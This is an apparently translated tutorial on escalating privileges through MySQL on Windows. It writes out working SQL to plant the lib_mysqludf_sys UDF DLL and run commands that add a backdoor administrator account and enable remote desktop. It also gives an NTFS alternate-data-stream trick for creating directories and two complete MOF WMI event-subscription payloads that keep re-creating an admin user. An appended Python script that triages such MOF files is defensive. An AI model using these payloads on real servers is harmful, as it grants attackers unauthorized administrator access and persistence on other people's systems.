1. Privilege escalation with sqlmap's UDF (lib_mysqludf_sys)
1. Find a writable directory to upload lib_mysqludf_sys.dll to; depending on the MySQL version, it then has to be written into Windows\System32 or into the MySQL lib\plugin directory:
select @@plugin_dir;
select load_file('c:\\recycler\\lib_mysqludf_sys.dll') into dumpfile 'c:\\windows\\system32\\lib_mysqludf_sys.dll';
2. Create the function, execute commands through it, then remove it:
create function cmd returns string soname 'lib_mysqludf_sys.dll';
select cmd('net user mrxt 123456 /add');
select cmd('net localgroup Administrators mrxt /add');
select cmd('regedit /s C:\\3389.reg');
drop function cmd;
delete from mysql.func where name='cmd';
3. In some cases you get "Can't open shared library"; the DLL then has to be exported to the lib\plugin directory. If that directory does not exist, it can be created with the NTFS ADS (alternate data stream) trick:
select 'DLL File' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';          -- creates the lib directory
select 'DLL File' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';  -- creates the plugin directory
2. MOF privilege escalation
Find a writable directory to upload the MOF file to, such as C:\RECYCLER\.
This payload uses WScript.Shell:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\cimv2";
    Name = "FiltP2";
    Query = "Select * from __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "ConsPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
This payload uses Shell.users:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\cimv2";
    Name = "FiltP2";
    Query = "Select * from __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "ConsPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"Shell.users\")\nz = WSH.Create(\"Newuser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\") = 3";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Then export it to the c:\windows\system32\wbem\mof\ directory:
select load_file('c:\\wmpub\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
This method keeps re-adding the user (the filter fires once a minute for as long as the subscription exists); to stop it, run net stop winmgmt and then delete the files.
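As an added defender-side example (not part of the original article), the following Python script parses a MOF file laid out like the ones above and reports every __FilterToConsumerBinding whose consumer runs script or a command line, which is what a responder wants when triaging a file found under wbem\mof. The sample MOF is constructed for the example and its command is a placeholder.

```python
import re

# Constructed sample laid out like the MOF subscription payload described on the page; placeholder command.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    Name = "FiltP2";
    Query = "Select * from __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "ConsPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"PLACEHOLDER_COMMAND\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
'''
INSTANCE_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\}\s*;', re.S | re.I)
PROP_RE = re.compile(r'(\w+)\s*=\s*("(?:[^"\\]|\\.)*"|[^;]+?)\s*;', re.S)
SCRIPT_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}

def parse_mof(text):
    """Return [(class, alias, {property: value})] for every 'instance of' block."""
    out = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        props = {}
        for name, raw in PROP_RE.findall(body):
            if raw.startswith('"'):  # unescape a MOF string literal (\" \n \\)
                raw = re.sub(r'\\(.)', lambda m: {'n': '\n'}.get(m[1], m[1]), raw[1:-1])
            props[name] = raw
        out.append((cls, alias, props))
    return out

def triage(text):
    """Follow each __FilterToConsumerBinding to its consumer; report consumers that execute code."""
    instances = parse_mof(text)
    by_alias = {a: (c, p) for c, a, p in instances if a}
    findings = []
    for cls, _a, props in instances:
        if cls.lower() != "__filtertoconsumerbinding":
            continue
        c_cls, c = by_alias.get(props.get("Consumer", "").lstrip("$"), ("", {}))
        _f_cls, f = by_alias.get(props.get("Filter", "").lstrip("$"), ("", {}))
        if c_cls.lower() in SCRIPT_CONSUMERS:
            findings.append({"consumer": c.get("Name"), "engine": c.get("ScriptingEngine"),
                             "script": c.get("ScriptText") or c.get("CommandLineTemplate"),
                             "filter": f.get("Name"), "trigger": f.get("Query")})
    return findings

if __name__ == "__main__":
    for hit in triage(SAMPLE_MOF):
        print(f"[!] {hit['filter']} -> {hit['consumer']} ({hit['engine']}): {hit['script']!r}")
```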
Reference articles:
http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
MySQL privilege escalation